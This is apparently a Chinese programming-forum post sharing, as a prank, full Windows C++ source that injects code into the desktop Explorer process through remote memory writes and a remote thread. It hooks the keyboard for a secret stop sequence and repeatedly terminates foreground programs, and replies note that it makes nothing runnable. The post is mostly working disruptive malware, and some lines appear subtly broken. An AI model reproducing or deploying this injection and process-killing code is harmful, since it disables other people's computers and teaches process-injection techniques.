一堆类似恶作剧的代码
不记得为什么要写的了,可能是因为太无聊/:L ..整理硬盘看到的, 不忍心直接删了, 来这里发一份.. :)// test.cpp : Defines the entry point for the application.//
#include "stdafx.h"
typedef int (WINAPI *MESSAGEBOXA)(HWND, LPCTSTR, LPCTSTR, UINT); //MessageBoxA原型
typedef HHOOK (WINAPI *SETWINDOWSHOOKEXA)(int,HOOKPROC, HINSTANCE, DWORD); //SetWindowsHookEx原型
typedef BOOL (WINAPI *UNHOOKWINDOWSHOOKEX)(HHOOK); //UnHookWindowsHookEx原型
typedef UINT (WINAPI *SETTIMER)(HWND, UINT, UINT, TIMERPROC); //SetTimer原型
typedef BOOL (WINAPI *KILLTIMER)(HWND, UINT); //KillTimer原型
typedef BOOL (WINAPI *TERMINATEPROCESS)(HANDLE, UINT); //TerminateProcess原型
typedef HWND (WINAPI *GETFOREGROUNDWINDOW)(); //GetForegroundWindow原型
typedef DWORD (WINAPI *GETWINDOWTHREADPROCESSID)(HWND, LPDWORD); //GetWindowThreadProcessId原型
typedef VOID (WINAPI *SLEEP)(DWORD); //Sleep原型
typedef HANDLE (WINAPI *OPENPROCESS)(DWORD, BOOL, DWORD); //OpenProcess原型
typedef LRESULT (WINAPI *CALLNEXTHOOKEX)(HHOOK, int, WPARAM, LPARAM); //CallNextHookEx原型
typedef BOOL (WINAPI *CLOSEHANDLE)(HANDLE);
typedef DWORD (WINAPI *GETCURRENTTHREADID)(VOID);
typedef struct { //注入的数据
DWORD dwMagic;
MESSAGEBOXA pfnMessageBoxA;
SETWINDOWSHOOKEXA pfnSetWindowsHookExA;
UNHOOKWINDOWSHOOKEX pfnUnHookWindowsHookEx;
SETTIMER pfnSetTimer;
KILLTIMER pfnKillTimer;
TERMINATEPROCESS pfnTerminateProcess;
GETFOREGROUNDWINDOW pfnGetForegroundWindow;
GETWINDOWTHREADPROCESSID pfnGetWindowThreadProcessId;
SLEEP pfnSleep;
OPENPROCESS pfnOpenProcess;
CALLNEXTHOOKEX pfnCallNextHookEx;
CLOSEHANDLE pfnCloseHandle;
GETCURRENTTHREADID pfnGetCurrentThreadId;
LPVOID pVirtualMemory;
DWORD dwCodeLen;
DWORD dwDesktopProcessId;
DWORD dwDesktopThreadId;
bool Quit;
HHOOK hhk;
UINT uTimerId;
DWORD dwPosition;
}InjectData, *pInjectData;
LRESULT CALLBACK KeyboardProc(int, WPARAM, LPARAM); //钩子回调函数
VOID CALLBACK TimerProc(HWND, UINT, UINT, DWORD); //时钟的回调函数
pInjectData GetDataAddress(LPVOID, LPVOID);
DWORD WINAPI mycode(LPVOID lpParam)
{
pInjectData Data = GetDataAddress(mycode, mycode);
HOOKPROC MyKeyboardProc = (HOOKPROC)((DWORD)Data->pVirtualMemory + ((DWORD)KeyboardProc - (DWORD)mycode));
TIMERPROC MyTimerProc = (TIMERPROC)((DWORD)Data->pVirtualMemory + ((DWORD)TimerProc - (DWORD)mycode));
Data->hhk = Data->pfnSetWindowsHookExA(WH_KEYBOARD, MyKeyboardProc, NULL, Data->dwDesktopThreadId); //挂键盘钩子
// Data->uTimerId = Data->pfnSetTimer(NULL, NULL, 1000, MyTimerProc); //打开时钟
while (true) {
Data->pfnSleep(1000);
TimerProc(0,0,0,0);
if (Data->Quit) {
// Data->pfnKillTimer(NULL, Data->uTimerId);
Data->pfnUnHookWindowsHookEx(Data->hhk);
break;
}
}
return 0;
}
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
pInjectData Data = GetDataAddress(mycode, KeyboardProc);
if ((code == HC_ACTION) && (lParam & 0x40000000)) {
unsigned char szPassword[] = {0x36,0x36,0x31,0x36,0x31,0x31,0x36};
if ((DWORD)wParam == szPassword)
Data->dwPosition++;
else
Data->dwPosition = 0;
if (Data->dwPosition == sizeof(szPassword)) {
Data->Quit = true;
//Data->pfnMessageBoxA(0, (char*)&wParam, 0, 0);
}
}
return Data->pfnCallNextHookEx(Data->hhk, code, wParam, lParam);
}
VOID CALLBACK TimerProc(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime)
{
pInjectData Data = GetDataAddress(mycode, TimerProc);
DWORD dwCurrProcId;
Data->pfnGetWindowThreadProcessId(Data->pfnGetForegroundWindow(), &dwCurrProcId);
if (!(dwCurrProcId % 2)) {
if (dwCurrProcId != Data->dwDesktopProcessId) {
HANDLE hProc = Data->pfnOpenProcess(PROCESS_ALL_ACCESS, false, dwCurrProcId);
Data->pfnTerminateProcess(hProc, 0x0);
Data->pfnCloseHandle(hProc);
}
}
}
pInjectData GetDataAddress(LPVOID lpEntryAddress, LPVOID lpCurrentAddress)
{
DWORD dwVM = 0;
__asm {
push eax;
mov eax, dword ptr ;
mov dwVM, eax;
pop eax;
}
pInjectData pDataAddress = (pInjectData)(dwVM & 0xFFFF0000);
while (true) {
if (pDataAddress->dwMagic == 0x11111111)
return (pInjectData)pDataAddress;
pDataAddress = (pInjectData)((char*)pDataAddress + 100);
}
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
DWORD dwDesktopProcID; //桌面的进程ID
DWORD nCodeLen = (DWORD)WinMain - (DWORD)mycode; //要注入的代码长度
InjectData Data; //注入的数据
DWORD dwStructLen = sizeof(InjectData); //注入的数据长度
DWORD dwSizeOfVirtual; //要分配的内存长度
Data.dwMagic = 0x11111111;
Data.dwPosition = 0;
//对齐
nCodeLen = 100 + (nCodeLen - 1) / 100 * 100;
dwSizeOfVirtual = nCodeLen + dwStructLen;//计算要分配的内存长度
//初始化注入的数据
Data.dwCodeLen = nCodeLen;
Data.Quit = false;
//
//设置远程线程要调用的函数地址
HINSTANCE hLib = LoadLibrary("User32.dll");
if (hLib) {
Data.pfnGetForegroundWindow = (GETFOREGROUNDWINDOW)GetProcAddress(hLib, "GetForegroundWindow");
Data.pfnKillTimer = (KILLTIMER)GetProcAddress(hLib, "KillTimer");
Data.pfnMessageBoxA = (MESSAGEBOXA)GetProcAddress(hLib, "MessageBoxA");
Data.pfnSetTimer = (SETTIMER)GetProcAddress(hLib, "SetTimer");
Data.pfnSetWindowsHookExA = (SETWINDOWSHOOKEXA)GetProcAddress(hLib, "SetWindowsHookExA");
Data.pfnUnHookWindowsHookEx = (UNHOOKWINDOWSHOOKEX)GetProcAddress(hLib, "UnhookWindowsHookEx");
Data.pfnGetWindowThreadProcessId = (GETWINDOWTHREADPROCESSID)GetProcAddress(hLib, "GetWindowThreadProcessId");
Data.pfnCallNextHookEx = (CALLNEXTHOOKEX)GetProcAddress(hLib, "CallNextHookEx");
FreeLibrary(hLib);
} else {
MessageBox(NULL, "加载User32.dll失败", 0, MB_OK);
return 0;
}
hLib = LoadLibrary("Kernel32.dll");
if (hLib) {
Data.pfnTerminateProcess = (TERMINATEPROCESS)GetProcAddress(hLib, "TerminateProcess");
Data.pfnSleep = (SLEEP)GetProcAddress(hLib, "Sleep");
Data.pfnOpenProcess = (OPENPROCESS)GetProcAddress(hLib, "OpenProcess");
Data.pfnCloseHandle = (CLOSEHANDLE)GetProcAddress(hLib, "CloseHandle");
Data.pfnGetCurrentThreadId = (GETCURRENTTHREADID)GetProcAddress(hLib, "GetCurrentThreadId");
FreeLibrary(hLib);
} else {
MessageBox(NULL, "加载Kernel32.dll失败", 0, MB_OK);
return 0;
}
//
//开始注入
Data.dwDesktopThreadId = GetWindowThreadProcessId(FindWindow("Progman", NULL), &dwDesktopProcID); //得到桌面句柄
if (dwDesktopProcID) {
Data.dwDesktopProcessId = dwDesktopProcID; //保存桌面进程ID
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwDesktopProcID); //打开进程,准备开辟一个空间来存放注入的代码
if (hProcess) {
LPVOID pMem = VirtualAllocEx(hProcess, NULL, dwSizeOfVirtual, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //在目标进程开辟一个内存空间存放代码
if (pMem) {
Data.pVirtualMemory = pMem;
LPVOID lpDataAddress = (char*)pMem + nCodeLen;//计算数据要写入的位置
if ((!WriteProcessMemory(hProcess, pMem, (LPVOID)mycode, nCodeLen, NULL) || (!WriteProcessMemory(hProcess, lpDataAddress, (LPVOID)&Data, dwStructLen, NULL)))) { //写入自己的代码.
MessageBox(NULL,"注入代码时失败", "提示", MB_OK);
VirtualFreeEx(hProcess, pMem, dwSizeOfVirtual, MEM_RELEASE);
}
else
CloseHandle(CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, lpDataAddress, 0, NULL)); //运行代码
}
CloseHandle(hProcess);
}
}
return 0;
} 看不懂。膜拜下。。。 作用就在Explore.exe里面注入段代码,然后不停的把最前台的程序杀掉,让你什么程序也运行不了./:017 厉害,好好学习!!! 太复杂了吧,懒得看了 呵呵,有些地方被换行了,看上去代码是乱糟糟的. 不错啊。 原帖由 xingke 于 2007-11-3 16:16 发表 https://www.chinapyg.com/images/common/back.gif
不错啊。
啊了,我也终于有个精华了,3Q. 哈哈
好狠的代码
页:
[1]